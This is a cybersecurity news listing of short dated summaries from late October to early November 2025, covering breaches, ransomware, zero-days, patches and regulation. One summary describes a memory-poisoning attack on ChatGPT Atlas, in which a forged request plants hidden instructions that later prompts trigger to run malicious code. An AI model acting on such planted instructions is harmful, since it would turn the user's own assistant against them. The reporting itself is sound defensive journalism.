China has passed major amendments to its 2016 Cybersecurity Law, set to take effect on January 1, 2026. The changes dramatically increase financial penalties for non-compliance, raising the maximum fine for Critical Information Infrastructure Operators (CIIOs) tenfold to RMB 10 million (approx. $1.41M) and for non-CIIOs to RMB 2 million. The amendments also introduce a new, general clause on Artificial Intelligence governance, signaling tighter regulatory control over technology and data security within the country.

Nov 3, 2025 · 4 min read

Microsoft Discovers 'SesameOp' Backdoor Using OpenAI API for Covert C2

Microsoft's Detection and Response Team (DART) has discovered a novel backdoor named 'SesameOp' that uniquely uses the OpenAI Assistants API for its command-and-control (C2) communications. Found during an espionage investigation, the malware hides its malicious traffic within legitimate API calls to the OpenAI platform, making it extremely difficult to detect. The attackers also used .NET AppDomainManager injection by compromising Microsoft Visual Studio utilities to achieve persistence.

Nov 3, 2025 · 5 min read

Europe Now #2 Global Ransomware Target, Attacks Accelerating to 24-Hour Deployments

Europe is now the second-largest global target for ransomware, accounting for 22% of all victims, according to CrowdStrike's 2025 European Threat Landscape Report. The report highlights a dramatic increase in attack speed, with groups like SCATTERED SPIDER now able to deploy ransomware in just 24 hours from initial access. The threat is fueled by a thriving initial access broker (IAB) market and escalating geopolitical tensions involving Russian, Chinese, and North Korean state-sponsored actors targeting critical sectors.

Nov 3, 2025 · 5 min read

Cl0p Ransomware Exploits Oracle EBS Zero-Day in Active Attacks

The notorious Cl0p ransomware gang is actively exploiting a critical zero-day vulnerability, CVE-2025-61882, in Oracle's E-Business Suite (EBS) to gain initial access to corporate networks. The complex flaw, which allows for remote code execution, has already been linked to at least two major security incidents, including a breach at Harvard University. With mass exploitation now being reported, organizations using Oracle EBS are at immediate and significant risk and are urged to apply mitigations immediately.

Nov 3, 2025 · 8 min read

Penn Data Breach: Hacker Claims 1.2M Donor Records Stolen, Exposes "Terrible Security"

A threat actor has claimed responsibility for a massive data breach at the University of Pennsylvania, asserting they have stolen the personal and financial data of 1.2 million donors and alumni. The breach was first revealed after offensive emails were sent from a university system hosted on Salesforce Marketing Cloud. The attacker claims to have gained initial access via a compromised employee single sign-on (SSO) account, which provided a gateway to sensitive platforms including Salesforce, Qlik, SAP, and SharePoint. Data samples, including highly sensitive demographic and financial information, were shared to substantiate the claims, highlighting severe security lapses at the institution.

Nov 2, 2025 · 6 min read

Polish Government Confirms "Very Serious" Data Breach at SuperGrosz Loan Platform

Polish authorities, led by the Deputy Prime Minister, have confirmed a "very serious" data breach at the online loan platform SuperGrosz. The attack resulted in the theft of a vast repository of sensitive customer information, including full names, national identification (PESEL) numbers, ID card details, bank account numbers, and detailed employment information. Poland's national cybersecurity teams have launched a full investigation, and the government has issued a public warning urging affected customers to take immediate security measures to prevent identity theft, such as blocking their PESEL numbers.

Nov 2, 2025 · 5 min read

Google Patches Critical Zero-Click RCE Flaw in Android; Millions of Devices at Risk

Google's November 2025 Android Security Bulletin includes a patch for a critical zero-click remote code execution (RCE) vulnerability, tracked as CVE-2025-48593. The flaw, residing in the Android System component, affects Android versions 13, 14, 15, and 16, and allows remote attackers to compromise a device without any user interaction. Due to its severity and zero-click nature, the vulnerability poses a severe risk to users. The update also addresses a high-severity privilege escalation flaw, CVE-2025-48581. Users are urged to install the update as soon as it becomes available.

Nov 2, 2025 · 4 min read

"SleepyDuck" RAT Emerges in Open VSX Marketplace via Malicious Update

A new remote access trojan (RAT) named "SleepyDuck" has been discovered in the Open VSX marketplace, a popular repository for IDE extensions. A seemingly benign developer extension, 'juan-bianco.solidity-vlang', was updated on November 1, 2025, to include the malware after it had already been downloaded thousands of times. SleepyDuck activates when a user opens a new editor window or a Solidity file. In a sophisticated twist, the malware uses an Ethereum smart contract for a resilient and dynamic command-and-control (C2) infrastructure, allowing it to fetch updated C2 server addresses from the blockchain.

Nov 2, 2025 · 5 min read

Samsung's November Security Update Patches 45 Vulnerabilities, Including Critical Android Flaws

Samsung has released its November 2025 security maintenance release, delivering patches for 45 vulnerabilities affecting its Galaxy smartphones and tablets. The update incorporates Google's latest Android patches, including a fix for the critical zero-click RCE vulnerability CVE-2025-48593. Additionally, the release addresses 9 Samsung-specific vulnerabilities (SVEs), including high-severity flaws in the fingerprint trustlet and image codec library, as well as 11 security issues in its Exynos chipsets. Users are advised to install the update promptly.

Nov 2, 2025 · 4 min read

openSUSE Patches Moderate-Severity Flaws in X.Org Server

The openSUSE project released a security advisory on November 1, 2025, to address three moderate-severity vulnerabilities in the xorg-x11-server package for its Tumbleweed distribution. The flaws could lead to out-of-bounds memory access, potentially resulting in denial-of-service via server crashes or, in some cases, privilege escalation. Users of openSUSE Tumbleweed are advised to apply the update to mitigate the risks.

Nov 2, 2025 · 3 min read

T-Mobile Enters Credit Card Market with Capital One, Raising Data Security Questions

T-Mobile announced its entry into the financial services sector with the launch of its first-ever credit card, created in partnership with banking giant Capital One. This strategic move will leverage T-Mobile's vast customer base and Capital One's financial infrastructure. The partnership introduces significant cybersecurity and data privacy considerations, as it creates a new, complex data environment merging telecommunications and financial information. Both companies have histories of data breaches, making robust security and compliance with regulations like PCI DSS critical for the new venture's success.

Nov 2, 2025 · 4 min read

China-Backed Group Exploits Unpatched Windows Flaw to Spy on EU Diplomats

A China-linked cyber-espionage group, UNC6384, associated with Mustang Panda, is actively exploiting an unpatched Windows UI misrepresentation vulnerability, CVE-2025-9491, to conduct espionage against European diplomatic entities. The campaign, active since September 2025, uses sophisticated phishing emails containing malicious LNK files themed around EU and NATO events. These files trigger a multi-stage attack that deploys the PlugX RAT via DLL side-loading. Despite being reported in 2024 and publicly disclosed in March 2025, Microsoft has decided not to issue a security patch, stating the flaw does not meet its bar for servicing.

Nov 1, 2025 · 5 min read

Akira Ransomware Claims Breach of Apache OpenOffice, Threatens Data Leak

The prolific Akira ransomware group has listed Apache OpenOffice, a popular open-source office suite, as a victim on its dark web data leak site. The threat actors claim to have exfiltrated 23 gigabytes of data from the Apache Software Foundation, including financial records, internal documents, and employee personally identifiable information (PII). As of November 1, 2025, the alleged breach has not been confirmed by the Apache Software Foundation, leaving the scope and authenticity of the claim unverified.

Nov 1, 2025 · 4 min read

Ukrainian Conti Ransomware Affiliate Extradited to US

Oleksii Lytvynenko, a 43-year-old Ukrainian national, has been extradited from Ireland to the United States for his alleged role in the notorious Conti ransomware syndicate. He pleaded not guilty in a Tennessee federal court to charges of conspiracy to commit computer fraud and extortion. Lytvynenko is accused of participating in attacks by the Conti group, which extorted over $150 million from more than 1,000 victims worldwide. If convicted, he faces a potential prison sentence of up to 25 years.

Nov 1, 2025 · 4 min read

New 'KYBER' Ransomware Emerges with Advanced Encryption and Data-Driven Extortion Model

Cybersecurity researchers at CYFIRMA have identified a new ransomware strain named KYBER, which employs a sophisticated hybrid encryption scheme including the post-quantum Kyber1024 algorithm. The ransomware, discovered on underground forums, follows a double-extortion model, threatening to leak stolen data if victims do not establish contact within two weeks. KYBER targets Windows systems in English-speaking countries, with a focus on high-value sectors like Aerospace & Defense and technology. Researchers warn it may evolve into a full-fledged Ransomware-as-a-Service (RaaS) operation.

Nov 1, 2025 · 4 min read

Australia Warns of 'BADCANDY' Malware Targeting Unpatched Cisco Devices

The Australian Signals Directorate (ASD) has issued an urgent warning about an ongoing cyberattack campaign deploying a new malware implant called 'BADCANDY' on unpatched Cisco IOS XE devices. The attackers are exploiting the critical remote code execution vulnerability CVE-2023-20198 (CVSS 10.0) to gain full control of routers and switches. The ASD reports a recent spike in activity, with 150 Australian devices infected in October 2025 alone. The malware, a non-persistent web shell, is being actively redeployed by attackers even after removal.

Nov 1, 2025 · 4 min read

Data Breaches Hit Toys 'R' Us Canada, Askul, and Verisure

A wave of data breaches has impacted several consumer-facing companies globally. Toys "R" Us Canada has had customer records leaked on the dark web. Japanese retailer Askul suffered a disruptive ransomware attack that halted operations and may have resulted in a data leak. Additionally, Swedish security firm Verisure disclosed a breach affecting 35,000 customers via a third-party vendor, and U.S.-based Jewett-Cameron Trading reported the theft of financial documents.

Oct 31, 2025 · 4 min read

CISA KEV Alert: XWiki RCE Flaw Actively Exploited for Cryptomining

The US Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in the XWiki enterprise wiki platform, CVE-2025-24893, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, rated 9.8 on the CVSS scale, allows an unauthenticated attacker to execute arbitrary code by injecting malicious Groovy expressions into a search query. Security researchers at VulnCheck have confirmed active exploitation in the wild, with attackers using the vulnerability to deploy cryptocurrency mining malware. CISA has mandated that federal agencies patch the flaw promptly due to the immediate risk.

Oct 31, 2025 · 4 min read

VMware Zero-Day LPE Flaw Exploited by China-Linked Actor Added to CISA KEV

CISA has added CVE-2025-41244, a high-severity local privilege escalation (LPE) vulnerability in VMware products, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw affects VMware Aria Operations and VMware Tools and allows a non-administrative user on a virtual machine to gain root privileges. The vulnerability has been exploited as a zero-day since mid-October 2024, with attribution pointing to UNC5174, a suspected China-linked threat actor. The flaw is an untrusted search path vulnerability, and a public proof-of-concept is available, increasing the risk to unpatched systems.

Oct 31, 2025 · 4 min read

Finance Execs Targeted in Sophisticated LinkedIn Phishing Scheme with Fake Board Invites

A sophisticated phishing campaign is targeting finance executives through LinkedIn direct messages, using fake invitations to an executive board as a lure. The multi-stage attack, detailed by Push Security, aims to harvest Microsoft credentials and session cookies to bypass MFA. The attack chain leverages trusted services to appear legitimate, starting with a Google open redirect, leading to a fraudulent portal hosted on Google Firebase, and using a Cloudflare CAPTCHA to evade security bots. This non-email-based phishing vector is reportedly becoming significantly more common, accounting for over a third of recent attempts tracked by researchers.

Oct 31, 2025 · 5 min read

Telecom Giant Ribbon Communications Breached by Nation-State Actor for 10 Months

Telecommunications provider Ribbon Communications has disclosed a significant security breach by a suspected nation-state actor. According to an SEC filing, the attackers first gained access in December 2024 and remained undetected for nearly a year until September 2025. The company, which serves critical clients including the U.S. Department of Defense and major carriers like Verizon, stated the actor accessed several customer files stored on two laptops outside the main network. The long dwell time and the nature of the target suggest a sophisticated espionage campaign, raising serious concerns about supply chain security in the telecommunications sector.

Oct 31, 2025 · 5 min read

Canada Issues National Alert as Hacktivists Target Critical Infrastructure

The Canadian Centre for Cyber Security, along with the RCMP, has issued a national alert warning of increasing cyberattacks by hacktivists against the nation's critical infrastructure. The advisory follows multiple successful breaches of internet-accessible Industrial Control Systems (ICS) in sectors like water treatment, food, and manufacturing. The alert notes a tactical shift by hacktivists from simple DDoS attacks to more disruptive intrusions into Operational Technology (OT). Authorities are urging organizations, especially in under-regulated sectors, to immediately inventory and secure exposed ICS/OT devices, recommending VPNs with 2FA and enhanced monitoring to mitigate the risk to public safety.

Oct 31, 2025 · 4 min read

Conduent Data Breach: 10 Million+ Individuals' Personal & Medical Data Exposed

Conduent Business Services, a major contractor for U.S. government agencies, has disclosed a massive data breach impacting over 10 million individuals. The incident, which occurred between October 2024 and January 2025, involved an unauthorized third party gaining access to Conduent's network and exfiltrating files. The compromised data is highly sensitive, including names, Social Security numbers, medical information, and health insurance details. The breach has affected residents across numerous states, including Texas, Washington, and California, and has triggered a legal investigation by the law firm Edelson Lechtzin LLP into the company's data privacy practices.

Oct 31, 2025 · 4 min read

Ad Giant Dentsu's Subsidiary Merkle Hit by Cyberattack, Staff and Client Data Exposed

Global advertising firm Dentsu has confirmed that its US-based customer experience management (CXM) subsidiary, Merkle, was the target of a cyberattack. The company detected 'abnormal activity' on Merkle's network and proactively shut down certain systems to contain the threat. An investigation has confirmed that the incident led to the exposure of both staff and sensitive client data. Merkle, a major player in the CXM industry, handles large volumes of customer data, making it a high-value target for threat actors. The full scope of the breach is still under investigation.

Oct 30, 2025 · 4 min read

EY Leaks 4TB+ SQL Database Packed with Corporate Secrets via Cloud Misconfiguration

Consulting giant EY (Ernst & Young) inadvertently exposed a massive, 4TB+ SQL Server backup file to the public internet due to a cloud storage misconfiguration. The unencrypted `.BAK` file, discovered by researchers at Neo Security, contained a treasure trove of highly sensitive internal data, including API keys, service account passwords, session tokens, and user credentials. The incident highlights the severe risks associated with cloud service misconfigurations, where tools designed for convenience can lead to catastrophic data exposure if not secured properly. Neo Security described the leak as equivalent to finding the 'master blueprint and physical keys to a vault.'

Oct 30, 2025 · 5 min read

IncRansom Claims 20TB Data Heist from Evolve Mortgage Services

The 'incransom' ransomware group has claimed responsibility for a significant data breach at Evolve Mortgage Services, listing the company on its dark web leak site on October 30, 2025. The attackers allege they have stolen over 20 terabytes of data, including 2 terabytes of databases containing sensitive PII such as Social Security numbers, client IDs, and full credit histories dating back to 2016. The group is using a pure data-theft extortion model, threatening to leak the data after claiming the company refused to negotiate. This incident highlights the ongoing threat of data extortion attacks against the U.S. financial services sector.

Oct 30, 2025 · 5 min read

New 'logins[.]zip' Infostealer Claims 99% Credential Theft in 12 Seconds Using Zero-Days

A new Malware-as-a-Service (MaaS) infostealer named 'logins[.]zip' is being sold on the clear web, boasting incredible speed and efficiency. According to a report from Hudson Rock, its authors claim it can exfiltrate 99% of passwords and cookies from a victim's machine in under 12 seconds. The stealer's key selling point is its alleged use of two Chromium zero-day exploits, which allow it to steal credentials without needing admin rights. The service, sold for $150/month, provides a browser-based builder for creating polymorphic stubs and targets logins, cookies, payment cards, and crypto wallets.

Oct 30, 2025 · 5 min read

UK's NCSC Warns 'Nationally Significant' Cyber Attacks Have More Than Doubled

The UK's National Cyber Security Centre (NCSC) has released its 2025 Annual Review, revealing a stark increase in major cyber threats. The agency handled 204 'nationally significant' incidents in the past year, more than double the 89 from the previous year. Ransomware remains the most acute threat, particularly to the UK's Critical National Infrastructure (CNI). The report highlights a growing gap between the escalating threats from APTs and cybercriminals and the nation's collective defenses, prompting the NCSC to urge all UK businesses to make cyber resilience a board-level priority and adopt foundational security controls.

Oct 29, 2025 · 5 min read

Qantas Data Breach: 5.7M Customer Records Leaked in Salesforce Supply Chain Attack

The personal data of 5.7 million Qantas Airways customers has been published on the dark web by a group calling itself 'Scattered Lapsus$ Hunters'. The leak, which occurred after a ransom deadline passed on October 11, 2025, is part of a broader supply chain attack that compromised a third-party Salesforce system used by one of the airline's offshore call centers. The compromised data includes names, emails, frequent flyer information, and for some, addresses, phone numbers, and dates of birth. The attack vector involved social engineering, with hackers impersonating Salesforce employees to gain access. Qantas confirmed the breach, stating it is one of 39 companies affected by the campaign and that financial data and passwords were not compromised. The incident has prompted warnings of secondary phishing attacks and a class-action complaint.

Oct 29, 2025 · 7 min read

Clop Ransomware Breaches American Airlines Subsidiary Envoy Air, Exploiting Oracle EBS Flaw

Envoy Air, a regional airline owned by American Airlines, has confirmed it was a victim of a hacking campaign orchestrated by the Clop ransomware group. The attackers exploited vulnerabilities in Oracle's E-Business Suite (EBS) to gain access and exfiltrate data. While Envoy Air states that no sensitive customer or personal data was compromised, the breach involved some business information and commercial contacts. Clop has listed American Airlines among more than 60 victims of its recent campaign targeting unpatched Oracle systems, threatening to leak stolen data if ransoms are not paid.

Oct 28, 2025 · 5 min read

Infostealer Malware Campaign Dumps 183 Million Credentials Online

A colossal 3.5-terabyte dataset named "Synthient," containing 183 million unique email and password combinations, has been indexed by Have I Been Pwned. The credentials were not stolen from a single service breach but were aggregated over time from devices infected with infostealer malware such as RedLine and Vidar. While Google confirmed its systems were not directly compromised, the leak poses a severe risk of credential stuffing attacks across countless online services. The data includes 16.4 million credentials never before seen in breach databases, highlighting the ongoing threat of malware-based data harvesting. Security experts urge immediate password updates and the adoption of multi-factor authentication (MFA).

Oct 28, 2025 · 5 min read

Cerner Discloses Patient Data Breach at Alaskan Hospital Months After Initial Intrusion

Electronic health records (EHR) vendor Cerner Corporation has informed Mat-Su Regional Medical Center in Alaska of a data breach affecting patient information. The security incident, which involved unauthorized access to legacy Cerner systems, was first detected in February 2025 but originated as early as January. The compromised data could include patient names, Social Security numbers, medical records, diagnoses, and other sensitive health information. The breach did not affect the hospital's own systems, but highlights significant supply chain risks in the healthcare sector. Cerner is offering two years of identity protection services to affected patients.

Oct 28, 2025 · 5 min read

Slow Email Breach Response Leads to 79% Higher Ransomware Risk, Report Finds

A new report from Barracuda Networks reveals a strong correlation between slow incident response times for email breaches and the likelihood of a subsequent ransomware attack. Organizations that take over nine hours to remediate an email compromise face a 79% higher chance of also being hit by ransomware. The study found that 78% of organizations experienced an email breach in the last year, with attackers often gaining access and deploying ransomware in under an hour. The high cost of recovery, especially for small businesses, underscores the critical need for automated detection and rapid response capabilities to contain initial email-based threats.

Oct 28, 2025 · 5 min read

CISA Warns of Actively Exploited Flaws in Dassault Systèmes' Manufacturing Software

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities in Dassault Systèmes' DELMIA Apriso manufacturing software to its Known Exploited Vulnerabilities (KEV) catalog. The flaws, CVE-2025-6205 (CVSS 9.1) and CVE-2025-6204 (CVSS 8.0), are being actively exploited in the wild. Attackers can chain them to create a privileged user account and then achieve remote code execution, leading to a full system compromise. The software is widely used in critical manufacturing sectors like automotive and aerospace. Federal agencies have been given a three-week deadline to apply patches released in August 2025.

Oct 28, 2025 · 5 min read

Apache Tomcat Flaws Expose Servers to Path Traversal and RCE Risk

The Apache Software Foundation has disclosed two new vulnerabilities impacting Apache Tomcat versions 9, 10, and 11. The most severe flaw, CVE-2025-55752, is a directory traversal vulnerability rated 'Important' that could allow an attacker to bypass security constraints and access protected directories like /WEB-INF/. If HTTP PUT requests are enabled—a non-default setting—this flaw can be escalated to achieve remote code execution (RCE). A second, low-severity flaw, CVE-2025-55754, affects Windows systems and could lead to code execution via malicious console log entries. Users are urged to upgrade to the latest versions to mitigate these risks.

Oct 28, 2025 · 5 min read

North Korean APT BlueNoroff Uses AI-Driven Spyware in New 'GhostCall' and 'GhostHire' Campaigns

The North Korean APT group BlueNoroff is conducting two new financially motivated campaigns, 'GhostCall' and 'GhostHire,' targeting the cryptocurrency and venture capital sectors. According to research from Kaspersky, the group is using sophisticated social engineering, enhanced by generative AI, to lure executives and developers on both Windows and macOS. The attacks involve fake meetings and job offers to trick victims into downloading malware capable of stealing cryptocurrency wallet data, macOS Keychain contents, and other sensitive information. The campaigns show BlueNoroff's increasing focus on macOS and its adoption of AI to accelerate malware development.

Oct 28, 2025 · 6 min read

Hacking Team Successor Memento Labs Linked to Chrome Zero-Day and 'Dante' Spyware

Kaspersky researchers have linked Memento Labs, the Italian company that succeeded the notorious surveillance vendor Hacking Team, to a cyber-espionage campaign that used a Google Chrome zero-day (CVE-2025-2783). The campaign, dubbed "Operation ForumTroll," targeted entities in Russia and Belarus with phishing links that installed spyware called "Dante." Analysis of Dante revealed code similarities to Hacking Team's old RCS spyware, confirming it as a commercial surveillance tool. The zero-day exploit allowed for infection simply by visiting a malicious website, highlighting the continued threat posed by commercial spyware vendors.

Oct 28, 2025 · 6 min read

Cisco and Citrix VPNs Linked to 5-7x Higher Ransomware Risk, At-Bay Report Finds

A new report from cyber-insurance provider At-Bay identifies email and remote access as the entry points for 90% of cyber claims in 2024. The 2025 InsurSec Rankings Report found that organizations using on-premise VPNs from vendors like Cisco and Citrix were five to seven times more likely to suffer a ransomware attack compared to those using other remote access solutions. Email fraud, often powered by AI, also saw a 30% surge in claim frequency. The report highlights the effectiveness of Managed Detection and Response (MDR) services in mitigating ransomware and ranks Sophos as the top-performing email security solution.

Oct 28, 2025 · 5 min read

Fortinet Silently Patches Critical, Actively Exploited FortiWeb Zero-Day

Fortinet has quietly released a patch for a critical, actively exploited zero-day vulnerability in its FortiWeb Web Application Firewall (WAF). The flaw, tracked as CVE-2025-64446 (CVSS 9.8), is a path traversal vulnerability that allows an unauthenticated remote attacker to create an administrator account and gain full control of the device. Attacks have been observed since at least early October 2025. Fortinet released the fix in version 8.0.2 on October 28 but did not immediately issue a public advisory, delaying awareness. The vulnerability was later added to CISA's KEV catalog, confirming its threat and mandating urgent patching.

Oct 28, 2025 · 5 min read

City of Gloversville, NY, Pays Partial Ransom After Attack Compromises Employee Data

The City of Gloversville, New York, has suffered a ransomware attack that was discovered on October 27, 2025. The attack disrupted city computer systems and compromised the personal and payroll information of current and former employees, including bank account numbers. After initially demanding $300,000, the city council approved a partial ransom payment of $150,000 to the unnamed threat actors in exchange for the return of the stolen data. The incident highlights the ongoing vulnerability of municipalities to ransomware attacks.

Oct 28, 2025 · 5 min read

Microsoft Report: AI-Generated Phishing Now 4.5x More Effective, Bypassing Traditional Defenses

According to the Microsoft 2025 Digital Defense Report, the effectiveness of phishing attacks has surged with the adoption of artificial intelligence. AI-generated emails now achieve a 54% click-through rate, 4.5 times higher than traditional methods. The report, covering July 2024 to June 2025, also highlights a 32% increase in identity-based attacks and the growing use of AI by nation-state actors for disinformation. Microsoft stresses that phishing-resistant MFA remains the most effective defense, blocking over 99% of identity attacks.

Oct 27, 2025 · 5 min read

CISA Orders Federal Agencies to Patch New Actively Exploited Vulnerability

On October 22, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a new, unspecified vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This action confirms that the flaw is being actively exploited in the wild by malicious actors. Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies are now required to remediate this vulnerability by a specific deadline to protect federal networks. While the CVE identifier was not immediately released, the alert serves as a critical warning to all organizations to prioritize its patching.

Oct 27, 2025 · 5 min read

18 Minutes to Mayhem: Ransomware Attacks Now Fully Automated, Slashing Defender Response Time

A new report from ReliaQuest reveals a dramatic acceleration in ransomware attacks, with the average time from initial access to lateral movement ('breakout time') plummeting to just 18 minutes. This is a significant decrease from 48 minutes in 2024, driven by the adoption of automation and AI by 80% of Ransomware-as-a-Service (RaaS) groups. The report highlights the Qilin ransomware gang as a prime example, whose platform automates key attack phases like discovery, backup deletion, and encryption. Other groups like LockBit are also integrating AI to enhance their operations, creating a hyper-competitive landscape where speed and automation are paramount. This shrinking response window poses a monumental challenge for security teams, demanding automated detection and response capabilities to counter the threat.

Oct 27, 2025 · 7 min read

Critical Adobe Commerce Flaw Under Active Exploitation, CISA Warns

A critical improper input validation vulnerability in Adobe Commerce and Magento, tracked as CVE-2025-54236, is being actively exploited in the wild. Dubbed 'SessionReaper,' the flaw allows an unauthenticated remote attacker to hijack user sessions via the REST API, leading to potential web shell deployment and complete store takeover. CISA has added the vulnerability to its KEV catalog, and with reports suggesting over 60% of Magento stores remain unpatched, immediate action is urged for all administrators.

Oct 27, 2025 · 5 min read

ChatGPT Flaw Allows 'Memory Poisoning' via CSRF Attack

A novel vulnerability discovered in OpenAI's ChatGPT Atlas web browser allows attackers to perform 'memory poisoning' through a Cross-Site Request Forgery (CSRF) attack. Researchers at LayerX Security found that this flaw can be used to invisibly inject malicious instructions into ChatGPT's persistent 'Memory' feature. These instructions survive across sessions and devices, and can be triggered by a user's normal prompts to execute malicious code, potentially leading to account takeover or malware deployment.

Oct 27, 2025 · 4 min read

APT-C-60 Escalates 'SpyGlace' Campaign Against Japan

The South Korea-aligned cyber-espionage group APT-C-60 has significantly intensified its campaign against Japanese organizations in the third quarter of 2025. According to JPCERT/CC and Cyble, the group has deployed at least three new versions of its custom 'SpyGlace' backdoor. The attackers have evolved their tactics, now attaching malicious VHDX files directly to phishing emails and abusing legitimate services like GitHub and StatCounter for stealthy command-and-control communications and malware delivery, making detection more challenging.

Oct 27, 2025 · 4 min read

Healthcare Sector Rocked by Breaches at ModMed, LifeBridge, and Right at Home

The healthcare sector continues to be a prime target for cyberattacks, with recent data breaches announced by Electronic Health Record (EHR) provider Modernizing Medicine (ModMed), home healthcare provider Right at Home, and Baltimore-based LifeBridge Health. The incidents, which include a ransomware attack claimed by the Sinobi group and a third-party breach via Oracle Health, have exposed a vast range of sensitive Protected Health Information (PHI), including Social Security numbers, medical diagnoses, and financial data.

Oct 27, 2025 · 4 min read

DDoS Attack on Russian Food Agency Cripples National Supply Chains

Russia's federal agency for veterinary and phytosanitary surveillance, Rosselkhoznadzor, has been targeted by a large-scale distributed denial-of-service (DDoS) attack starting October 22, 2025. The attack crippled the agency's critical electronic certification systems, including the 'Mercury' platform, which is essential for tracking animal products. The outage caused significant delays in food shipments from major producers of meat, milk, and baby food across the nation, highlighting the vulnerability of critical national infrastructure to cyberattacks. Russian telecom providers are working to mitigate the attack, for which no group has claimed responsibility.

Oct 26, 2025 · 4 min read

Safepay Ransomware Hits German Surveillance Firm Xortec, Sparking Supply Chain Fears

The Safepay ransomware group has claimed responsibility for a cyberattack against Xortec GmbH, a German provider of professional video surveillance solutions. The group has listed Xortec on its data leak site with a payment deadline of October 27, 2025. This attack raises significant supply chain concerns, as a compromise of a value-added distributor like Xortec could potentially lead to backdoored hardware or software being deployed in sensitive client environments. Safepay is a relatively new but aggressive ransomware-as-a-service (RaaS) operation known for its rapid double-extortion attacks.

Oct 26, 2025 · 5 min read

Google Issues Emergency Patch for Critical Chrome RCE Flaw Found by AI

Google has released an emergency security update for the Chrome browser, addressing a critical remote code execution (RCE) vulnerability in its V8 JavaScript engine. The flaw, tracked as CVE-2025-12036, was discovered by Google's internal AI-driven research project, 'Big Sleep.' Successful exploitation could allow an attacker to execute arbitrary code on a user's system by tricking them into visiting a malicious website. The patch has been rolled out for Windows, macOS, and Linux users, who are urged to update their browsers immediately to mitigate the high-severity threat.

Oct 25, 2025 · 4 min read

Nation-State and Financial Cybercrime Blur as Industrial Sector Becomes Top Target

A new report from Trellix reveals a significant convergence between the tactics of nation-state actors and financially motivated cybercriminals, with both increasingly leveraging AI-powered tools. The industrial sector has emerged as the most targeted industry, accounting for over 36% of attacks analyzed between April and September 2025. The research highlights the dominance of PowerShell as a key attack tool, used in nearly 78% of ransomware campaigns. The United States remains the most targeted nation, and the ransomware landscape is highly fragmented, with the top five groups accounting for less than 40% of all incidents.

Oct 25, 2025 · 5 min read

India Enacts New Telecom Cybersecurity Rules for IMEI and Mobile Number Validation

India's Ministry of Communications has enacted new cybersecurity regulations for its telecommunications sector, effective October 22, 2025. The 'Telecommunications (Telecom Cyber Security) Amendment Rules, 2025' introduce two key measures: the establishment of a centralized Mobile Number Validation (MNV) platform to secure digital communications, and stricter controls on International Mobile Equipment Identity (IMEI) numbers. The new IMEI rules prohibit the assignment of already-used IMEIs to new devices and mandate that sellers and buyers of used devices verify the IMEI against a national database to combat theft and tampering.

Oct 25, 2025 · 4 min read

UN Convention Against Cybercrime Signed in Hanoi Amid Global Endorsement and Controversy

In a landmark event in Hanoi, Vietnam, representatives from nearly 100 UN member states have signed the United Nations Convention against Cybercrime. Adopted by the UN General Assembly in December 2024, this treaty, also known as the Hanoi Convention, establishes the first global legal framework for international cooperation in combating a wide array of online crimes, including fraud, child exploitation, and money laundering. While hailed as a milestone by the UN Secretary-General, the event drew criticism from rights groups over the choice of Vietnam as the host, and a major tech industry group, the Cybersecurity Tech Accord, declined to attend.

Oct 25, 2025 · 4 min read

EU Accuses Meta and TikTok of Breaching Digital Services Act Transparency Rules

The European Commission has issued preliminary findings that Meta's platforms (Facebook and Instagram) and TikTok have breached their obligations under the Digital Services Act (DSA). The Commission alleges the companies failed to provide adequate access to public data for researchers, hindering independent scrutiny of their platforms. Furthermore, Meta is accused of using 'dark patterns' and creating a burdensome process for users to report illegal content. These are initial findings, and both companies will have the opportunity to respond and propose remedies before any final decision or penalties are imposed.

Oct 25, 2025 · 4 min read

Ransomware Attacks on Critical Industries Skyrocket by 34%, KELA Reports

A new report from cyber intelligence firm KELA reveals a staggering 34% year-over-year increase in ransomware attacks targeting critical industries between January and September 2025. These vital sectors, including manufacturing, healthcare, and energy, accounted for half of all 4,701 recorded global incidents. The United States was the most heavily targeted nation. The report also highlights the consolidation of the ransomware ecosystem, with just five groups—Qilin, Clop, Akira, Play, and SafePay—responsible for nearly a quarter of all attacks.

Oct 25, 2025 · 5 min read

Patch Now: Microsoft Fixes 170+ Flaws, Including Four Actively Exploited Zero-Days

Microsoft has released its October 2025 Patch Tuesday update, a massive release fixing over 170 security vulnerabilities across its product ecosystem. The update is critical for all users, as it contains patches for four zero-day vulnerabilities that are being actively exploited in the wild. Two of these flaws, CVE-2025-24990 and CVE-2025-59230, allow for local privilege escalation to Administrator or SYSTEM rights. CISA has added the exploited vulnerabilities to its KEV catalog, mandating urgent patching for federal agencies.

Oct 25, 2025 · 5 min read

UK Gov & NCSC Issue Urgent Warning to FTSE 350 Boards on Cyber Resilience

The UK's National Cyber Security Centre (NCSC) and government ministers have sent a formal letter to the leaders of all FTSE 350 companies, demanding that cyber resilience be treated as a top board-level priority. The call to action follows the NCSC's latest annual review, which revealed a 50% increase in significant cyber incidents. The letter outlines three practical steps: adopt the government's Cyber Governance Code, enroll in the NCSC's Early Warning service, and mandate Cyber Essentials certification throughout supply chains.

Oct 24, 2025 · 5 min read

Google Patches 6th Actively Exploited Chrome Zero-Day of 2025

Google has issued an emergency security update for its Chrome web browser to address CVE-2025-10585, a high-severity type confusion vulnerability in the V8 JavaScript engine. This marks the sixth time in 2025 that Google has patched a Chrome zero-day vulnerability that was being actively exploited in the wild. The flaw could allow an attacker to achieve arbitrary code execution on a victim's machine by tricking them into visiting a malicious website. All users of Chrome and other Chromium-based browsers are urged to update immediately.

Oct 24, 2025 · 5 min read

Agenda Ransomware Evolves, Hits Critical Infrastructure

The Agenda ransomware group, also known as Qilin, is escalating its attacks by targeting critical infrastructure sectors with evolved tactics. According to research from Trend Micro, the ransomware-as-a-service (RaaS) operation is using a cross-platform approach, abusing legitimate remote management tools and deploying Linux-based ransomware on Windows hosts to evade security. The group also employs Bring Your Own Vulnerable Driver (BYOVD) attacks to neutralize endpoint defenses and steals backup credentials to hinder recovery, primarily targeting high-value organizations in the U.S., Canada, and the U.K.

Oct 24, 2025 · 5 min read

Tengu Ransomware Hits Brazilian Education Provider

